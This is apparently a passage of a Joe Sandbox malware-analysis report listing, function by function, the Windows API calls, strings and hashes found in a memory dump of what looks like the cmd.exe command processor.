CreateProcessAsUserW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E45EE
_local_unwind.MSVCRT ref: 00007FF7823E4644
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823E47E1
DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E4802
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823EECD4
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823EECF0
DeleteProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823EED12

Strings

=ExitCode, xrefs: 00007FF7823E454C
=ExitCodeAscii, xrefs: 00007FF7823E456B
\XCOPY.EXE, xrefs: 00007FF7823E43F7
h, xrefs: 00007FF7823E436D
%08X, xrefs: 00007FF7823E452C
%01C, xrefs: 00007FF7823E47B1
COPYCMD, xrefs: 00007FF7823E439C, 00007FF7823E44B9

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
API String ID: 388421343-2905461000
Opcode ID: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
Instruction ID: 45153a5da332e9f13f90a9b4cc20274975fdf5eafc6591f100395bdc5d5849e0
Opcode Fuzzy Hash: 55d34b9fbbbe98a267e2a1b689c77e543e9d7ab297a27b4d624c1a5c7cdf6f16
Instruction Fuzzy Hash: E9F14235A18B8295E760AB11E4507BAF7A4FF89742FA04179DA4D43F54DFBCE448CB20

Function 00007FF7823E5554 Relevance: 45.8, APIs: 18, Strings: 8, Instructions: 295
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7823E4E35), ref: 00007FF7823E55DA
RegQueryValueExW.KERNELBASE ref: 00007FF7823E5623
RegQueryValueExW.KERNELBASE ref: 00007FF7823E5667
RegQueryValueExW.KERNELBASE ref: 00007FF7823E56BE
RegQueryValueExW.KERNELBASE ref: 00007FF7823E5702
RegQueryValueExW.KERNELBASE ref: 00007FF7823E5759
RegQueryValueExW.KERNELBASE ref: 00007FF7823E57CF
RegQueryValueExW.KERNELBASE ref: 00007FF7823E5862
RegCloseKey.KERNELBASE ref: 00007FF7823E587B
time.MSVCRT(?,00000000,?,00000001,?,00007FF7823E4E35), ref: 00007FF7823E5896
srand.MSVCRT ref: 00007FF7823E58A5

Strings

AutoRun, xrefs: 00007FF7823E585B
PathCompletionChar, xrefs: 00007FF7823E57C8
EnableExtensions, xrefs: 00007FF7823E5660
DisableUNCCheck, xrefs: 00007FF7823E5614
CompletionChar, xrefs: 00007FF7823E5752
DefaultColor, xrefs: 00007FF7823E56FB
Software\Microsoft\Command Processor, xrefs: 00007FF7823E55D3
DelayedExpansion, xrefs: 00007FF7823E56B7

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: QueryValue$CloseOpensrandtime
String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
API String ID: 145004033-3846321370
Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
Instruction ID: cfb1b55e255c250bba52f146bca12e34ef3502b926dfafb88d1960a82abc946b
Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
Instruction Fuzzy Hash: 00E1947651DA82D6E790AB10E45057AF7A0FB88742FE05135EA8E43E54DFFCD948CB20

Function 00007FF7823E37D8 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 269
registrythreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E380B
OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7823E3821
HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823E3845
RegOpenKeyExW.KERNELBASE ref: 00007FF7823E3875
GetConsoleOutputCP.KERNELBASE ref: 00007FF7823E38BF
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E38DD
memset.MSVCRT ref: 00007FF7823E3909
_setjmp.MSVCRT ref: 00007FF7823E3952
GetConsoleOutputCP.KERNELBASE ref: 00007FF7823E398B
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823E39A2
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823EEA1F
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823EEA2F

Part of subcall function 00007FF7823E5920: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,00007FF7823EB71F), ref: 00007FF7823E5997
Part of subcall function 00007FF7823E5920: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,?,?,?,00000000,00000000,00000000,00007FF7823EB71F), ref: 00007FF7823E59C5

GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823EEA41

Strings

Software\Policies\Microsoft\Windows\System, xrefs: 00007FF7823E3867
DisableCMD, xrefs: 00007FF7823EEA18

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
API String ID: 2624720099-1920437939
Opcode ID: 9a4cddc928fe4c71fd6c761995599b2788caccd561f5d3a8cbf937f1688b90ea
Instruction ID: a6f30f1346a20e5f13098fd28a7f24ccb631e9ec35c6971847cb159746e7c9a2
Opcode Fuzzy Hash: 9a4cddc928fe4c71fd6c761995599b2788caccd561f5d3a8cbf937f1688b90ea
Instruction Fuzzy Hash: 58C1AC25F086429AE750BB61E4602B8FBA0FF49712FF4417CD91E57E91DEBCA848C630

Function 00007FF7823E823C Relevance: 15.1, APIs: 10, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF7823E8280
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E829D

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
Instruction ID: b32cb9b1789d78b8746b107b373b1966d490181b8ff92c530f75a6c4013879fa
Opcode Fuzzy Hash: 9fa4dae725f9512e7002593702cffe0a246d57342299abf5542ad382d0469498
Instruction Fuzzy Hash: 67516179A09B42D6E710AF12E4541B9FBA0FB49B92FE48575CA1D43B60CFBCE854C720

Function 00007FF7823E2978 Relevance: 9.1, APIs: 6, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
Instruction ID: cf0fda47ae1fcaca37bf2931e3d9f99129344a985fc304028f76123f4d90d015
Opcode Fuzzy Hash: 449607d8b30cf2fcca0a8811105e09d4af6f68671a5f8fd8d6b2897c28d3601c
Instruction Fuzzy Hash: 51516D25B0868195EB30AF15E5142BAE690FB54BA1FE44239DE6D07FD0DF7CE449C710

Function 00007FF7823E4D5C Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 268
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4D9A

Part of subcall function 00007FF7823E58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF7823FC6DB), ref: 00007FF7823E58EF

SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4DBB
_get_osfhandle.MSVCRT ref: 00007FF7823E4DCA
GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4DE0
_get_osfhandle.MSVCRT ref: 00007FF7823E4DEE
GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4E04

Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E0589
Part of subcall function 00007FF7823E0580: SetConsoleMode.KERNELBASE ref: 00007FF7823E059E
Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E05AF
Part of subcall function 00007FF7823E0580: GetConsoleMode.KERNELBASE ref: 00007FF7823E05C5
Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E05EF
Part of subcall function 00007FF7823E0580: GetConsoleMode.KERNELBASE ref: 00007FF7823E0605
Part of subcall function 00007FF7823E0580: _get_osfhandle.MSVCRT ref: 00007FF7823E0632
Part of subcall function 00007FF7823E0580: SetConsoleMode.KERNELBASE ref: 00007FF7823E0647

Part of subcall function 00007FF7823E4A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A28
Part of subcall function 00007FF7823E4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A66
Part of subcall function 00007FF7823E4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A7D
Part of subcall function 00007FF7823E4A14: memmove.MSVCRT(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A9A
Part of subcall function 00007FF7823E4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4AA2

Part of subcall function 00007FF7823E4AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D8798), ref: 00007FF7823E4AD6
Part of subcall function 00007FF7823E4AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D8798), ref: 00007FF7823E4AEF

Part of subcall function 00007FF7823E5554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF7823E4E35), ref: 00007FF7823E55DA
Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E5623
Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E5667
Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E56BE
Part of subcall function 00007FF7823E5554: RegQueryValueExW.KERNELBASE ref: 00007FF7823E5702

GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4E35
GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4E81
GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4F69
GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4F95
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FB0
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FC1
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FD8
GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E4FF8
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E5037
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E504B
GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E50DF
GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E50F2
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E510F
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E5130
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E514A
free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7823E5175

Part of subcall function 00007FF7823E3578: _get_osfhandle.MSVCRT ref: 00007FF7823E3584
Part of subcall function 00007FF7823E3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E359C
Part of subcall function 00007FF7823E3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35C3
Part of subcall function 00007FF7823E3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35D9
Part of subcall function 00007FF7823E3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35ED
Part of subcall function 00007FF7823E3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E3602

Strings

CopyFileExW, xrefs: 00007FF7823E5108
IsDebuggerPresent, xrefs: 00007FF7823E5122
KERNEL32.DLL, xrefs: 00007FF7823E50EB
SetConsoleInputExeNameW, xrefs: 00007FF7823E5143

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressAllocHandleProcProcess$CommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
API String ID: 1049357271-3021193919
Opcode ID: 435433f7253096d870c33aa278a517d18c81e5400009277a10a2e2eb1186a394
Instruction ID: e2b4de068f5b9bd485b54334b7b7e689d55a2f88eac40b734f7ceb225c21face
Opcode Fuzzy Hash: 435433f7253096d870c33aa278a517d18c81e5400009277a10a2e2eb1186a394
Instruction Fuzzy Hash: ACC17A65A08B4296EA44BB11E814179FBA0FF89B53FE44178D90E07B55DFBCE849C330

Function 00007FF7823E3C24 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 289
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E3D0C
towupper.MSVCRT ref: 00007FF7823E3D2F
iswalpha.MSVCRT ref: 00007FF7823E3D4F
towupper.MSVCRT ref: 00007FF7823E3D75
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E3DBF
GetFileAttributesW.KERNELBASE ref: 00007FF7823E3E7E
GetFileAttributesW.KERNELBASE ref: 00007FF7823E3EE9
SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E3F32
_local_unwind.MSVCRT ref: 00007FF7823E4062
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E4067
_local_unwind.MSVCRT ref: 00007FF7823E4098
_local_unwind.MSVCRT ref: 00007FF7823E40B3
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E40B8
_local_unwind.MSVCRT ref: 00007FF7823E40DE
_local_unwind.MSVCRT ref: 00007FF7823E40F9
_local_unwind.MSVCRT ref: 00007FF7823E4114

Strings

:, xrefs: 00007FF7823E3D89

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
String ID: :
API String ID: 1809961153-336475711
Opcode ID: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
Instruction ID: eea14582b966939e525daddcb7a96133027dc7a1bd3874831c9cbf8c375002a0
Opcode Fuzzy Hash: db7a8accf24e76443df151eec26ec66c8909a5ebe3ef3b4491d16ca320e82ff4
Instruction Fuzzy Hash: 74D1943660CB85A1EA60EB15E4642B9F7A1FB84742FD04179DA4E43FA4DFBCE449C720

Function 00007FF7823E2394 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF7823E23F1

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7823E2438

Part of subcall function 00007FF7823E081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E084E

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823E24DD
wcschr.MSVCRT ref: 00007FF7823EE12A
_wcsupr.MSVCRT ref: 00007FF7823EE146

Strings

\CMD.EXE, xrefs: 00007FF7823EE22A
PATHEXT, xrefs: 00007FF7823E2459, 00007FF7823EE0FB
KEYS, xrefs: 00007FF7823E2498
$P$G, xrefs: 00007FF7823E2516
PROMPT, xrefs: 00007FF7823E246E, 00007FF7823E251D
PATH, xrefs: 00007FF7823E2444, 00007FF7823EE0E2
.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC, xrefs: 00007FF7823EE0F4
COMSPEC, xrefs: 00007FF7823E2483, 00007FF7823EE28B

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782424000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682321720.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
API String ID: 2622545777-4197029667
Opcode ID: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
Instruction ID: cb338761042c7bd0f67f347705d5db74958590520d1d20d3bb95bcab9aeff1ba
Opcode Fuzzy Hash: bd59c29d01747683900c9969ab54c99ddb5983c61e93a73bd4a825f93bf20993
Instruction Fuzzy Hash: 7891B325B1964295EE64BF11D8602F8A7A0FF48B96FE44179C90E07E95DFBCE948C330

Function 00007FF7823E0580 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_osfhandle.MSVCRT ref: 00007FF7823E0589
SetConsoleMode.KERNELBASE ref: 00007FF7823E059E
_get_osfhandle.MSVCRT ref: 00007FF7823E05AF
GetConsoleMode.KERNELBASE ref: 00007FF7823E05C5
_get_osfhandle.MSVCRT ref: 00007FF7823E05EF
GetConsoleMode.KERNELBASE ref: 00007FF7823E0605
_get_osfhandle.MSVCRT ref: 00007FF7823E0632
SetConsoleMode.KERNELBASE ref: 00007FF7823E0647
_get_osfhandle.MSVCRT ref: 00007FF7823E0684
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823E0699
_get_osfhandle.MSVCRT ref: 00007FF7823ED891
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823ED8A6

Strings

CMD.EXE, xrefs: 00007FF7823E065F

Memory Dump Source

Source File: 00000005.00000002.1682206927.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000005.00000002.1682191136.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682235207.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1682252322.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
